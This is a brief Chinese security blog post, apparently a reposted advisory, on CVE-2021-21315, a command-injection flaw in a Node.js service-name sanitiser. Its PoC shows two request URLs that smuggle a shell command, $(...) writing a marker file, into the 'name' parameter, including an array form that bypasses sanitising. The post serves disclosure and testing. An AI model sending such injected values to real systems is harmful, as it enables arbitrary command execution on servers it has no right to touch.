CVE-2021-21315 Node.JS OS命令执行

  • A+
所属分类:安全漏洞
CVE-2021-21315 Node.JS OS sanitize service Parameters Command Injection

[PoC]
[Victim Site]/api/getServices?name=$(echo -e 'Sekurak' > pwn.txt)
[Victim Site]/api/getServices?name[]=$(echo -e 'Sekurak' > pwn.txt)




https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC

本文始发于微信公众号(安全鸭):CVE-2021-21315 Node.JS OS命令执行

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: